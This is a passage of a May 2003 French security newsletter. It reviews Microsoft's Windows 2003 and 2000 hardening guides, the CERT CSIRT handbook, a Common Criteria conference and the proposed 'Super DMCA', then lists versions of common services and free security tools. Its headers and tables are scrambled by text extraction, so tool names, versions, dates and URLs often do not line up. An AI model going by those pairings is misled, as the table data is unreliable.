OR
RM
MA
AT
TIIO
ON
NS
SE
ET
T LE
EG
GIIS
SL
LA
AT
TIIO
ON
N
LES
INFORMATIONS
WINDOWS 2003
MICROSOFT – WINDOWS 2003 SECURITY GUIDE
# Description
Un guide de 290 pages intitulé ‘Windows Server 2003 Security Guide’ a été mis à disposition fin avril par le
département ‘Solutions for Security’ de la société Microsoft. Annoncé livré sécurisé par conception, par défaut et
dans son déploiement, le système ‘Windows 2003 Server’ offre cependant de nombreuses options de configuration
permettant d’affiner la politique de sécurité dans l’optique de l’adapter aux besoins spécifiques du contexte utilisateur.
Le guide proposé par Microsoft présente ainsi les différents paramètres de configuration sur lesquels l’exploitant
pourra intervenir afin d’adapter le système en implémentant une politique de sécurité plus ou moins restrictive. Trois
niveaux de sécurité sont décrits qui doivent théoriquement répondre à la majorité des configurations. Microsoft
annonce avoir validé ces niveaux et intensivement testé leur traduction sous la forme de paramètres de configuration.
Ce guide est organisé en 12 chapitres dont 10 chapitres dédiés à un thème spécifique et partageant une structuration
similaire comme le montre la table des matières du guide:
Introduction Windows Server 2003 Security Guide
Overview
Executive Summary
Who Should Read This Guide
Get Secure Stay Secure
Scope of this Guide
Content Overview
Skills and Readiness
Requirement
Style Conventions
Summary
2- Creating a Member Server Baseline
1- Configuring the Domain Infrastructure
Overview
Overview
Windows Server 2003 Baseline Policy
Domain Policy
Audit Policy 52
Account Policies
User Rights Assignments
Password Policy
Security Options
Account Lockout Policy
Event Log
Kerberos Policy
System Services
Security Options
Additional Registry Settings
Summary
Additional Security Settings
Summary
3- Hardening Domain Controllers
4- Hardening Infrastructure Servers
Overview
Overview
Audit Policy Settings
User Rights Assignements
Security Options
Security Options
Event Log Settings
Event Log Settings
System Services
System Services
Summary
Summary
5 - Hardening File Servers
6 - Hardening Print Servers
Overview
Overview
Security Options
Security Options
Event Log Settings
Event Log Settings
System Services
System Services
Summary
Summary
Page 12/65
Mai 2003
7 - Hardening IIS Servers
Overview
Security Options
Event Log Settings
System Services
Summary
9 - Hardening Certificate Services Servers
Overview
Security Options
Event Log Settings
System Services
Summary
Conclusion
8 - Hardening IAS Servers
Overview
Audit Policy
Security Options
Event Log
System Services
Summary
10 - Hardening Bastion Hosts
Overview
Security Options
Event Log Settings
System Services
Summary
Ce guide est livré sous la forme d’un exécutable contenant le document au format PDF mais aussi de nombreux
documents complémentaires, fichiers et outils destinés à accompagner et faciliter la démarche.
Documents PDF
Le guide de sécurisation est accompagné des quatre documents suivants au format PDF:
• Release Notes
Ce document présente l’historique des révisions effectuées sur le guide de sécurisation.
• Delivering the Windows Server 2003 Security Guide
Cette présentation du cadre de travail proposé par Microsoft contient de nombreux pointeurs et références
vers les différentes méthodologies mises à la disposition des utilisateurs:
- MSF
Microsoft Security Framework
- MOF
Microsoft Operation Framework
- SRMD
Microsoft Security Risk Management Discipline
Ce cadre de travail est parfaitement synthétisé par le synoptique suivant extrait du document.
• Supporting the Windows Server 2003 Security Guide
Ce document décrit l’organisation mise en place par Microsoft pour assurer le support et la maintenance du
système Windows Server 2003 et des différents composants logiciels constituant celui-ci.
• Testing the Windows Server 2003 Security Guide
Ce dossier décrit en détail la procédure de test mise en œuvre pour valider chacun des principes et des règles
de sécurisation exposés dans le guide. Sont notamment présentées les infrastructures de test des trois
scénarios d’exploitation retenus: ‘Legacy client environnement’, ‘Enterprise Client Environnement’ et
enfin ‘High security client environnement’.
Modèles de sécurité
Les modèles de sécurité correspondant aux différents rôles d’un système sont proposés organisés en trois
catégories correspondant aux trois scénarios d’exploitation précédemment décrits. Ces modèles sont livrés sous la
forme d’un fichier ‘.inf’ exploitable par le biais de la console de sécurité.
Page 13/65
Mai 2003
Quelques 10 check-list sont par ailleurs proposées sous la forme d’un document au format WORD d’une page
contenant la liste récapitulative des actions à mener pour sécuriser un système ayant un rôle bien défini:
•
•
•
•
•
•
•
•
•
•
Legacy Client
Enterprise Client
X
X
X
X
X
X
X
X
X
X
X
X
X
X
X
SMTP Bastion Host
Member Server Baseline
Infrastructure Server
Domain Controller
Domain
File Server
Print Server
IAS Server
IIS Server
Certificate Services
X
High Security
X
X
X
X
X
X
X
X
Checklist
X
X
X
X
X
X
X
X
X
X
Scripts de configuration
Sept scripts s’appuyant sur la commande ‘NetSH’ sont livrés qui permettent de configurer le filtre de paquet
IPSEC pour les différents contextes d’utilisation du système.
•
•
•
•
•
•
•
Domain Controller
DHCP server
File Server
IIS Server
Print Server
WINS Server
SMTP Bastion server
Rejet
Rejet
Rejet
Rejet
Rejet
Rejet
Rejet
du
du
du
du
du
du
du
trafic
trafic
trafic
trafic
trafic
trafic
trafic
non
non
non
non
non
non
non
strictement
strictement
strictement
strictement
strictement
strictement
strictement
nécessaire
nécessaire
nécessaire
nécessaire
nécessaire
nécessaire
nécessaire
pour
pour
pour
pour
pour
pour
pour
un
un
un
un
un
un
un
contrôleur de domaine
serveur DHCP
serveur de fichier
serveur IIS
serveur d’impression
serveur WINS
serveur de protection SMTP
Scripts de validation
Douze scripts ‘.NET’ sont fournis qui permettent de vérifier le bon fonctionnement d’une configuration à partir des
éléments de paramétrage contenus dans le fichier ‘config’ livré avec les scripts.
• AdminChangePassword
Changement du mot de passe administrateur via l’objet ‘ldap:’
• UserChangePassWord
Changement du mot de passe utilisateur via l’objet ‘ldap:’
• AdminFileAccess
Copie des fichiers à partir d’un partage vers un autre partage
• UserFileAccess
Copie des fichiers à partir d’un partage vers un autre partage
• AdminLogon
Tentative de connexion administrateur via LDAP
• UserLogon
Tentative de connexion utilisateur via LDAP
• AdminPrint
Transmission d’un travail d’impression sur une imprimante
• UserPrint
Transmission d’un travail d’impression sur une imprimante
• AdminPrintQueues
Etat des queues d’impression via l’objet ‘winmgmts:’
• UserPrintQueues
Etat des queues d’impression via l’objet ‘winmgmts:’
• DirectoryQuery
Obtention du nom d’un utilisateur dans l’annuaire via l’objet ‘ldap:’
• Win2kReleaseIPRenewIP
Renouvellement d’un bail DHCP
On notera que ces scripts nous offrent d’excellents exemples de programmation de fonctions de test et de
validation en basic ‘.NET’.
Avec ce paquetage, Microsoft nous démontre sa capacité à répondre efficacement à la problématique du déploiement
et de la configuration d’une infrastructure complexe dans un environnement de production devant assurer un bon
niveau de sécurité.
Nous recommandons non seulement la lecture du guide de sécurisation mais aussi celle du dossier exposant la
méthodologie de test et de validation.
http://go.microsoft.com/fwlink/?LinkId=14845
MICROSOFT – WS2003 & XP THREATS AND COUNTERMEASURES GUIDE
# Description
Complémentaire du guide de sécurisation ‘Windows Server 2003 Security Guide’, ce second guide de 257 pages
dénommé ‘Threats & Countermeasures Guide’ livre une liste exhaustive des paramètres de configuration des
systèmes WS 2003 et XP.
Présenté organisé autour des sept thèmes utilisés dans le guide de sécurisation - à savoir ‘Domain Policy’, ‘Audit
Policy Settings’, ‘User Rights Assignments’, ‘Security Options’, ‘Event Log Settings’, ‘System Services’ et
‘Additional Security Settings’ - chaque paramètre est présenté en indiquant :
- son domaine de validité,
- la vulnérabilité ou le risque associé à la manipulation de ce paramètre,
- la contre-mesure proposée visant à limiter le risque,
- et enfin l’impact potentiel d’une modification du paramètre sur le fonctionnement du système.
Un extrait de la table des matières de cette véritable mine d’information est proposé ci-dessous :
1- Domain level Policies
Account Policies
Account Lockout Policy
Kerberos Policy
Page 14/65
Mai 2003
Audit Policy
2- User Rights Assignment
3- Security Options
Accounts
Audit
Devices
Domain controller
Domain member
Interactive logon
Microsoft network client and server
Microsoft network client
Microsoft network server
Network access
Network security
Recovery console
Shutdown
System cryptography
System objects
System settings
4- Event Log
5- System Services
Services Overview
Services Description
Alerter
Application Layer Gateway Service
Application Management
ASP
Automatic Updates
Background Intelligent Transfer Service
Certificate Services
Client Service for NetWare
ClipBook
Cluster Service
COM+ Event Services
COM+ System Application
Computer Browser
Cryptographic Services
DHCP Client
DHCP Server
Distributed File System
Distributed Link Tracking Client
Distributed Link Tracking Server
Distributed Transaction Coordinator
DNS Client
DNS Service
Error Reporting Service
Event Log
Fax Service
File Replication
File Server for Macintosh
FTP Publishing Service
Help and Support
HTTP Server
Human Interface Device Access
IAS Jet Database Access
IIS Admin Service
IMAPI CD Œ Burning COM Service
Indexing Service
Infrared Monitor
Internet Authentication Service
Internet Connection Firewall
Intersite Messaging
IP Version 6 Helper Service
IPSec Policy Agent (IPSec Service)
Kerberos Key Distribution Center
License Logging Service
Logical Disk Manager
Logical Disk Manager Administrative Service
Message Queuing
Message Queuing Down Level Clients
Message Queuing Triggers
Messenger
Microsoft POP3 Service
MS Software Shadow Copy Provider
MSSQL$UDDI
MSSQLServerADHelper
Net Logon
NetMeeting Remote Desktop Sharing
Network Connections
Network DDE
Network DDE DSDM
Network Location Awareness (NLA)
Network News Transport Protocol (NNTP)
NTLM Security Support Provider
Performance Logs and Alerts
Plug and Play
Portable Media Serial Number
Print Server for Macintosh
Print Spooler
Protected Storage
Remote Access Auto Connection Manager
Remote Access Connection Manager
Remote Administration Service
Remote Desktop Help Session Manager
Remote Installation
Remote Procedure Call (RPC)
Remote Procedure Call (RPC) Locator
Remote Registry Service
Remote Server Manager
Remote Server Monitor
Remote Storage Notification
Remote Storage Server
Removable Storage
Resultant Set of Policy Provider
Routing and Remote Access
SAP Agent
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
Simple Mail Transport Protocol (SMTP)
Simple TCP/IP Services
Single Instance Storage Groveler
Smart Card
SNMP Service
SNMP Trap Service
Special Administration Console Helper
SQLAgent$* (* UDDI or WebDB)
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper Service
TCP/IP Print Server
Telephony
Telnet
Terminal Services
Terminal Services Licensing
Terminal Services Session Directory
Themes
Trivial FTP Daemon
Uninterruptible Power Supply
Upload Manager
Virtual Disk Service
Volume Shadow Copy
WebClient
Web Element Manager
Windows Audio
Windows Image Acquisition (WIA)
Windows Installer
Windows Internet Name Service (WINS)
Windows Management Instrumentation
Windows Management Instrumentation Driver
Windows Media Services
Windows System Resource Manager
Windows Time
WinHTTP Web Proxy Auto Œ Discovery Service
Wireless Configuration
WMI Performance Adapter
Workstation
World Wide Web Publishing Service
Software Restriction Policies
Windows XP, Office XP, & WS 2003 Adm Templates
Modify the Security Configuration Editor User Interface
Security Considerations for Network Attacks
AFD
Additional Member Server Hardening Procedures
Securing the Accounts
NTFS
Data and Application Segmentation
Configure SNMP Community Name
Disable NetBIOS and SMB on Public Facing Interfaces
Page 15/65
Mai 2003
Configure Terminal Services Port
Configure IPSec Policies
Conclusion
More Information
Avec ce guide, Microsoft nous offre enfin le document de référence tant attendu qui permettra à chacun de s’y
retrouver dans le véritable dédale des paramètres de configuration de la sécurité du système. Microsoft nous offrira-til un jour une version complète portant sur tous les paramètres existants et non pas seulement sur les paramètres liés
à la sécurité ?
http://go.microsoft.com/fwlink/?LinkId=15159
WINDOWS 2000
MICROSOFT – WINDOWS 2000 HARDENING GUIDE
# Description
En avril 2001, Philip Cox nous proposait un extrait de son livre 'Windows 2000 Security Handbook' portant sur la
sécurisation des systèmes Windows 2000 (Rapport N°33 – Avril 2001). La partie présentée avait ainsi pour vocation de
guider l’utilisateur vers une méthode de sécurisation des systèmes d’exploitation Windows 2000 Server, et par
extension Windows 2000 Professional.
La NSA, l’agence de sécurité américaine, prenait ensuite le relais avec une série de 17 documents entièrement
consacrés à la sécurité de Windows 2000 et d’un guide de sécurisation dédié au système Windows XP.
Microsoft réagit enfin en nous livrant son propre guide de sécurisation intitulé ‘Windows 2000 Hardening Guide’.
Constitué de 128 pages et livré au format WORD, ce guide porte sur les deux versions du système d’exploitation –
‘Professional’ et ‘Server’ – en s’intéressant aux différents rôles pouvant être dévolus à celles-ci : station ou portable
membre d’un domaine, station indépendante, contrôleur de domaine, serveur membre d’un domaine ou encore
serveur autonome.
Bénéficiant des meilleurs sources d’information car directement rédigé par une équipe de l’éditeur, ce guide est plus
complet et plus didactique que ses deux homologues dont notamment le guide de la ‘NSA’. On appréciera le style
rédactionnel de ce document pour lequel les auteurs ne se sont pas contenté d’aligner des listes de paramètres de
configuration. La présence de nombreux tableaux récapitulatifs - en particulier les trois tableaux fournis en annexe facilite notablement la lecture de ce guide dont la table des matières est la suivante :
1. INTRODUCTION
2. SYSTEM CONFIGURATIONS
2.1 BUILT-IN GROUPS
3. OPERATING SYSTEM INSTALLATION
3.1 PREPARING FOR INSTALLATION
3.2 WINDOWS 2000 INSTALLATION PROCESS
3.2.1 Installation Methods
3.2.2 Initiating the Installation from a Bootable CD-ROM
3.2.3 Convert a Windows 2000 Server to a Domain Controller
3.3 CHOOSING GOOD PASSWORDS
3.3.1 Windows 2000 Password Representations
3.3.2 What constitutes a good password?
3.4 WINDOWS 2000 SERVICE PACK CONSIDERATIONS
4. SECURITY CONFIGURATION
4.1 WINDOWS 2000 SECURITY POLICIES
4.1.1 Local Security Policy
4.1.2 Domain Security Policy
4.1.3 Organizational Unit Group Policy Objects
4.2 ADDITIONAL SECURITY CONFIGURATION INTERFACES
4.2.1 Security Configuration Editor
4.2.2 Other tools
5. SECURITY CONFIGURATION
5.1 ACCOUNT POLICIES
5.1.1 Password Policy
5.1.2 Account Lockout Policy
5.1.3 Access the Kerberos Policy Settings
5.2 LOCAL POLICIES
5.2.1 Audit Policy
5.2.2 Logon Rights and Privileges
5.2.3 Modify Security Options
5.2.4 Additional Security Settings
Page 16/65
Mai 2003
5.3
AUDIT LOG MANAGEMENT
5.3.1 Access the Settings for Event Logs
5.4 DEFAULT GROUP ACCOUNTS
5.4.1 Review / Modify Group Account Memberships for a Domain
5.4.2 Review / Modify Group Account Memberships for a Standalone or Member Computer
5.4.3 Change the Primary Group Membership of an Account
5.5 DEFAULT USER ACCOUNTS
5.5.1 Review / Modify Default User Accounts for a Domain
5.5.2 Review / Modify Default User Accounts Locally
5.6 SYSTEM SERVICES
5.6.1 Disable Unnecessary System Services on Domain Computers
5.6.2 Disable Unnecessary System Services Locally
5.6.3 Minimum System Services
5.7 SECURING THE FILE SYSTEM
5.7.1 Set Permissions through a Domain Policy
5.7.2 Set Permissions Locally through the Security Configuration Editor
5.8 SHARE FOLDER PERMISSIONS
5.9 SECURING THE REGISTRY
5.9.1 Set Registry Permissions through a Domain Policy
5.9.2 Set Registry Permissions through Regedt32.exe
5.10 IPSEC POLICY
5.11 Encrypting File System
5.12 Enable Automatic Screen Lock Protection
5.13 Update The System Emergency Repair Disk
6. WINDOWS 2000 HARDENING GUIDE CONFIGURATION TEMPLATES
6.1 TEMPLATE MODIFICATIONS AND MANUAL SETTINGS
6.2 SECURITY CONFIGURATION TEMPLATE APPLICATION TOOLS
6.3 MANAGING AND APPLYING SECURITY CONFIGURATION SECURITY TEMPLATES
6.3.1 Extending the security configuration editor interface
6.3.2 Viewing and editing a security configuration template
6.3.3 Applying a security template to a local computer
6.3.4 Deploying a security template to an Active Directory object security policy
7. REFERENCES
APPENDIX A - WINDOWS 2000 DEFAULT SECURITY POLICY SETTINGS
APPENDIX B – USER RIGHTS AND PRIVILEGES
APPENDIX C - WINDOWS 2000 SECURITY CONFIGURATION CHECKLIST
Sept modèles de sécurité correspondant aux principaux rôles d’un système Windows 2000 sont livrés sous la forme
d’un fichier ‘.inf’ exploitable par le biais de la console de sécurité. Un script nommé ‘installScereglv’ permet
d’automatiser l’opération de mise à jour de la liste des scripts et d’enregistrer ceux-ci sur la console.
Les modèles suivants sont fournis dans le paquetage contenant la version téléchargeable du guide:
•
•
•
•
•
•
•
Configuration commune
Station autonome
Serveur autonome
Portable membre d’un domaine
Station membre d’un domaine
Serveur membre d’un domaine
Contrôleur de domaine
Script
Script
Script
Script
Script
Script
Script
‘W2KHG-baseline’
‘W2KHG-StandaloneWKS’
‘W2KHG-StandaloneServer’
‘W2KHG-MemberLaptop’
‘W2KHG-MemberWKS’
‘W2KHG-MemberServer’
‘W2KHG-DomainController’
Le lecteur aura noté la prise en compte des spécificités liées aux postes de travail portables de plus en plus
couramment rencontrés dans l’entreprise par le biais d’un modèle dédié mais aussi qu’il aura fallu attendre plus de 3
ans pour pouvoir disposer de la part de l’éditeur d’un guide de sécurisation réellement exploitable.
http://www.microsoft.com/technet/security/prodtech/windows/win2khg.asp
http://www.microsoft.com/downloads/details.aspx?FamilyID=15E83186-A2C8-4C8F-A9D0-A0201F639A56&DisplayLang=en
PREVENTION
CMU/SEI – MISE A JOUR DU ‘CSIRT HANBOOK’
# Description
Quelques 5 ans après la publication de la première version du ‘CSIRT Handbook’,
la division ‘Software Engineering Institute’ de l’université de Carnegie-Mellon
nous propose une mise à jour de cet ouvrage de référence.
Intitulé ‘Handbook for Computer Security Incident Response Teams (CSIRTs)’, cet ouvrage de 223 pages a
pour objectif d’accompagner les organisations confrontées à la difficile tâche de la mise en place d’une équipe
spécialisée dans la gestion des incidents de sécurité ou ‘CSIRT’. Rappelons que ce sigle ‘barbare’ désigne
l’infrastructure mise en œuvre par de grandes organisations généralement privées dans l’optique de coordonner les
Page 17/65
Mai 2003
actions de gestion des incidents ayant une incidence sur la sécurité de leur système d’information.
Les différents points essentiels pour la réussite d’une telle démarche sont abordés en détail au long des 5 chapitres
constituant cet ouvrage dont un extrait de la table des matières est proposé ci-après.
1 Introduction
2 Basic Issues
2.1 CSIRT Framework
2.2 Service and Quality Framework
2.3 CSIRT Services
2.4 Information Flow
2.5 Policies
2.6 Quality Assurance
2.7 Adapting to Specific Needs
3 Incident Handling Service
3.1 Service Description
3.2 Service Functions Overview
3.3 Triage Function
3.4 Handling Function
3.5 Announcement Function
3.6 Feedback Function
3.7 Interactions
3.8 Information Handling
4 Team Operations
4.1 Operational Elements
4.2 Fundamental Policies
4.3 Continuity Assurance
4.4 Security Management
4.5 Staff Issues
5 Closing Remarks
5.1 Closing Remarks from the First Edition
5.2 Closing Remarks for the Second Edition
Appendix A: About the Authors
Appendix B: Glossary
Bibliography
Cette nouvelle édition reprend la structure et le fond de l’édition précédente mais se démarque de celle-ci par
l’intégration de la liste des services définie à la suite des travaux menés en commun avec les sociétés STELVIO
(chargé de la gestion et de l’habilitation des CSIRT en Europe) et PRESECURE (œuvrant dans le domaine de
l’assistance et de la formation). Le lecteur intéressé pourra se reporter au document intitulé ‘CSIRT Services’ qui
nous livre une description exhaustive et détaillée des services susceptibles d’être proposés par un ‘CSIRT’ (Rapport
N°53 – Décembre 2002).
Les autres modifications concernent :
- la mise à jour des différents exemples pratiques présentés tout au long du guide,
- l’alignement avec le tout nouveau guide intitulé ‘Organisational Models for CSIRTs’ annoncé disponible sous peu.
Nous avons particulièrement apprécié la présence en annexe d’un glossaire très complet et d’une bibliographie
conséquente et parfaitement à jour.
http://www.cert.org/archive/pdf/csirt-handbook.pdf
http://www.sei.cmu.edu/publications/documents/03.reports/03hb002.html
LA
LEGISLATION
CRITERES COMMUNS
CC – 4IEME CONFERENCE INTERNATIONALE
# Description
La 4ème conférence internationale ‘Critères communs’ aura lieu du 7 au 9 septembre 2003,
à Stockholm.
Les ‘Critères Communs’ ou ‘CCSec’ forment le cadre directeur, pour ne pas dire l’ossature d’une démarche de
rationalisation, de structuration et de normalisation des méthodologies d’évaluation et d’assurance de la sécurité des
systèmes d’information. Cette démarche a été engagée depuis plusieurs années, d’abord indépendamment par de
nombreux pays (USA, Canada, Europe avec les ITSEC) puis en commun, afin d’harmoniser les terminologies et
critères jusqu’alors utilisés. Cette harmonisation a donné lieu aux CCSEC V1.0, puis V2.0 (Mai 1998) et enfin V2.1
(Mai 1999).
Page 18/65
Mai 2003
Rappelons que cette dernière version résulte de l’adoption des Critères Communs en tant que Norme Internationale
(ISO 15408) ce qui a conduit à devoir aligner la version originale (2.0) notamment sur le plan de la présentation et
du vocabulaire (Rapport N°16 - Novembre 1999).
Les sessions de présentations sont organisées autour des cinq thèmes fédérateurs suivants :
Challenges for a New Millennium
Ce thème regroupe différentes présentations techniques ayant pour points communs les méthodologies applicables
mais aussi les nouveaux défis qui devront être pris en compte dans les futures versions des CCSec. Seront
notamment abordés les sujets suivants: la problématique de la définition d’une TOE (Cible d’évaluation) et les
profils de protections.
Le cas particulier de la compatibilité entre la norme ISO/IEC 17799 (BS 7799 partie 1) et l’exigence des CCSec
en matière de gestion du cycle de vie (ALC_DVS) devrait y être traité sous l’intitulé ‘Is Compliance With ISO/IEC
17799 Sufficient to Meet the CC Life-Cycle Requirements (ALC_DVS) ?’
Business Advantages for the private sector, benefits for the public, standardisation possibilities & need
L’objectif de ce thème est de mettre en évidence les gains substantiels qui pourront être retirés de la mise en
œuvre des ‘CCSec’ dans différents secteurs de l’industrie et du commerce mais aussi dans le cadre des
organisations publiques.
A cette fin, plusieurs exemples pratiques d’utilisation – ou de projets d’utilisation - des CCSec seront présentés.
The Economics of Evaluating and Certifying IT Security
Les CCSec seront ici abordés dans la perspective des avantages économiques et des services associés. Seront
notamment étudiés les facteurs économiques qui pilotent les schémas d’évaluation et de certification dans les
contextes civils, commerciaux et militaires.
Evaluation techniques and applications today
Ce thème aborde la problématique de la mise en œuvre concrète des CCSec en proposant un état des lieux
abordant des sujets d’actualité: projets initiés et retours d’expérience depuis la conférence de l’année précédente,
problèmes rencontrés à l’occasion de campagnes d’évaluation récentes, outils et environnements permettant de
simplifier la mise en œuvre d’une évaluation et de l’analyse technique.
Common Criteria in System Certification
Divisé en trois sessions, ce thème aborde un sujet d’actualité, celui du positionnement des CCSec dans le cadre
plus large des méthodologies de certification et d’audit et, plus particulièrement, vis à vis de la norme ISO 17799
(BS 7999 – partie 1) et d’ISMS (BS 7799 – partie 2).
http://www.iccconference.com/agenda/index.asp
http://www.commoncriteria.org/
DMCA
DMCA – SUR LA LEGALITE DES EQUIPEMENTS DE SECURITE
# Description
Une extension à la loi américaine dite DMCA (Digital Millenium Copyright Act) proposée en avril dernier par le MPAA
(Motion Picture Association of America) pourrait rendre illégale l’utilisation des pare-feu et autres dispositifs de
sécurité. Référencée sous la dénomination de ‘Super DMCA’, cette extension fait l’objet d’une très importante levée
de bouclier de la part de nombreuses associations et organisations dont la célèbre EFF (Electronic Frontier
Foundation).
Pour mémoire, six états américains - Delaware, Illinois, Michigan, Oregon, Pennsylvanie, Wyoming - ont déjà
publié leur propre amendement au DMCA dans le courant de l’année 2003 conduisant à la fermeture ou au
déplacement de nombreux sites ayant trait à la sécurité et aux technologies associées. D’ici la fin de l’année, sept
nouveaux états - Arkansas, Colorado, Floride, Georgie, Massachusetts, Tennessee et Texas - devraient eux
aussi mettre en application une telle extension.
A l’origine de cette polémique, un paragraphe présent dans la proposition de loi présentée par le MPAA stipulant qu’il
est notamment ‘criminel de posséder un dispositif permettant de recevoir, transmettre ou de retransmettre un
quelconque service de communication sans l’autorisation expresse du fournisseur de service’.
Ce simple paragraphe conduit à pouvoir déclarer illégal l’utilisation ou la possession d’un équipement de sécurité placé
en coupure dans un flux potentiellement ouvert par un tiers mais aussi de bien d’autres équipements, à commencer
par les récepteurs de radiocommunication.
Plus largement, quatre catégories d’activité sont explicitement visées par le super DMCA s’y l’on se réfère à l’analyse
proposée par l’EFF:
1. La possession, le développement, la distribution ou l’utilisation de tout dispositif de communication en rapport
avec un service de communication sans disposer de l’autorisation préalable du fournisseur de service,
2. Le masquage de l’origine ou de la destination de toute communication vis à vis du fournisseur de service,
3. La possession, le développement, la distribution ou l’utilisation de tout dispositif non conforme à la loi,
4. La publication de plans ou d’instructions permettant la réalisation d’un dispositif dont il est patent que celui-ci
puisse être utilisé en violation de la loi.
Page 19/65
Mai 2003
Le lecteur constatera l’ampleur de la menace que pourrait bien faire planer la mise en application générale de cette
proposition de loi aux Etats-Unis, non seulement sur le plan des libertés individuelles mais aussi sur le plan
commercial.
Page d’accueil de l’outil ‘LaBrea’
Site de Niels Provost
au 30 Avril 2003
au 31 Mars 2003
http://www.hackbusters.net/LaBrea/lbathome.html
http://www.citi.umich.edu/u/provos/
http://www.freedom-to-tinker.com/archives/000336.html
http://www.eff.org/IP/DMCA/states/200304_sdmca_eff_analysis.php
Page 20/65
Mai 2003
LO
OG
GIIC
CIIE
EL
LS
S LIIB
BR
RE
ES
S
LES
SERVICES DE BASE
Les dernières versions des services de base sont rappelées dans les tableaux suivants. Nous conseillons
d’assurer rapidement la mise à jour de ces versions, après qualification préalable sur une plate-forme
dédiée.
RESEAU
Nom
Fonction
BIND
Gestion de Nom (DNS) 9.2.2
03/03/03 http://www.isc.org/products/BIND
8.3.4
16/11/02
Serveur d’adresse
3.0p2
15/01/03 http://www.isc.org/products/DHCP/dhcp-v3.html
Serveur de temps
4.1.1c-rc2 26/04/03 http://www.ntp.org/downloads.html
Serveur de fichiers
2.6.2
29/11/01 http://www.wu-ftpd.org
DHCP
NTP4
WU-FTP
Ver.
Date
Source
MESSAGERIE
Nom
Fonction
Ver.
Date
IMAP4
POP3
SENDMAIL
Relevé courrier
Relevé courrier
Serveur de courrier
2002c1
4.0.5
8.12.9
18/04/03 ftp://ftp.cac.washington.edu/imap/
13/03/03 ftp://ftp.qualcomm.com/eudora/servers/unix/popper/
30/03/03 ftp://ftp.sendmail.org/pub/sendmail/RELEASE_NOTES
Source
Nom
Fonction
Ver.
Date
APACHE
Serveur WEB
WEB
ModSSL
$ MySQL
$ SQUID
1.3.27
2.0.45
API SSL Apache 1.3.27 2.8.14
Base SQL
3.23.56
4.013
Cache WEB
2.5s3
Source
03/10/02
30/03/03
23/10/02
13/03/03
16/05/03
25/05/03
http://httpd.apache.org/dist
http://www.modssl.org
http://www.mysql.com/doc/N/e/News-3.23.x.html
http://www.squid-cache.org
AUTRE
Nom
$ INN
MAJORDOMO
OpenCA
$ OpenLDAP
LES
Fonction
Ver.
Gestion
Gestion
Gestion
Gestion
2.4.0
1.94.5
0.9.1.1
2.1.19
des news
des listes
de certificats
de l’annuaire
Date
Source
10/05/03
15/01/00
28/02/03
08/05/03
http://www.isc.org/products/INN
http://www.greatcircle.com/majordomo
http://www.openca.org/openca/download-releases.shtml
ftp://ftp.openldap.org/pub/OpenLDAP/openldap-release/
OUTILS
Une liste, non exhaustive, des produits et logiciels de sécurité du domaine public est proposée dans les
tableaux suivants.
LANGAGES
Nom
$ SPLINT
Perl
PHP
Fonction
Ver.
Analyse de code
Scripting
WEB Dynamique
3.1.1
5.8.0
4.3.1
Date
Source
25/05/03 http://lclint.cs.virginia.edu
12/08/02 http://www.cpan.org/src/index.html
17/02/03 http://www.php.net/downloads.php
ANALYSE RESEAU
Nom
Big Brother
Dsniff
$ EtterCap
$ Ethereal
IP Traf
Nstreams
SamSpade
TcpDump
Libpcap
TcpFlow
TcpShow
WinPCap
Fonction
Ver.
Visualisateur snmp
Boite à outils
Analyse & Modification
Analyse multiprotocole
Statistiques IP
Générateur de règles
Boite à outils
Analyse multiprotocole
Acquisition Trame
Collecte données
Collecte données
Acquisition Trame
1.9c
2.3
0.6.a
0.9.12
2.7.0
1.0.3
1.14
3.7.2
0.7.2
0.20
1.81
3.0
Date
Source
15/05/02
17/12/00
03/05/03
01/05/03
19/05/02
06/08/02
10/12/99
27/02/02
27/02/02
26/02/01
21/03/00
10/04/03
http://bb4.com/
http://www.monkey.org/~dugsong/dsniff
http://ettercap.sourceforge.net/index.php?s=history
http://www.ethereal.com
http://cebu.mozcom.com/riker/iptraf/
http://www.hsc.fr/ressources/outils/nstreams/download/
http://www.samspade.org/ssw/
http://www.tcpdump.org/
http://www.tcpdump.org/
http://www.circlemud.org/~jelson/software/tcpflow/
http://ftp7.usa.openbsd.org/pub/tools/unix/sysutils/tcpshow
http://winpcap.polito.it/news.htm
Page 21/65
Mai 2003
ANALYSE DE JOURNAUX
Nom
Fonction
Ver.
Analog
Autobuse
SnortSnarf
WebAlizer
Journaux serveur http
Analyse syslog
Analyse Snort
Journaux serveur http
5.32
1.13
021111
2.01-10
Date
Source
23/03/03
31/01/00
02/11/02
24/04/02
http://www.analog.cx
http://www.picante.com/~gtaylor/autobuse
http://www.silicondefense.com/software/snortsnarf/
http://www.mrunix.net/webalizer/download.html
ANALYSE DE SECURITE
Nom
FIRE
$ curl
$ Nessus
Nmap
Pandora
$ Saint
Sara
Tara (tiger)
Tiger
Trinux
Whisker
Fonction
Ver.
Boite à outils
Analyse http et https
Vulnérabilité réseau
Vulnérabilité Netware
Vulnérabilité système
Vulnérabilité système
Boite à outils
LibWhisker
0.3.5b
7.10.5
2.0.6
3.27
4.0b2.1
4.3.1
4.1.4c
3.0.3
2.2.4p1
0.81pre0
1.6
Date
Source
29/11/02
19/05/03
22/05/03
28/04/03
12/02/99
25/05/03
14/03/03
15/08/02
19/07/99
07/11/01
29/11/02
http://biatchux.dmzs.com/
http://curl.haxx.se/
http://www.nessus.org
http://www.insecure.org/nmap/nmap_download.html
http://www.packetfactory.net/projects/pandora/
http://www.saintcorporation.com/updates.html
http://www.www-arc.com/sara/downloads/
http://www-arc.com/tara
ftp://net.tamu.edu/pub/security/TAMU/tiger
http://sourceforge.net/projects/trinux/
http://www.wiretrip.net/rfp/p/doc.asp?id=21
CONFIDENTIALITE
Nom
OpenPGP
$ GPG
Fonction
Ver.
Signature/Chiffrement
Signature/Chiffrement
1.2.2
Date
Source
http://www.openpgp.org
03/05/03 http://www.gnupg.org
CONTROLE D’ACCES
Nom
Fonction
Ver.
TCP Wrapper
Xinetd
Accès services TCP
Inetd amélioré
7.6
2.3.11
Date
Source
ftp://ftp.cert.org/pub/tools/tcp_wrappers
15/04/03 http://synack.net/xinetd/
CONTROLE D’INTEGRITE
Nom
Fonction
Ver.
Tripwire
ChkRootKit
Intégrité LINUX
Compromission UNIX
2.3.47
0.40
Date
Source
15/08/00 http://www.tripwire.org/downloads/index.php
03/04/03 http://www.chkrootkit.org/
DETECTION D’INTRUSION
Nom
Fonction
Deception TK Pot de miel
LLNL NID
IDS Réseau
Snort
IDS Réseau
$ Shadow
IDS Réseau
Ver.
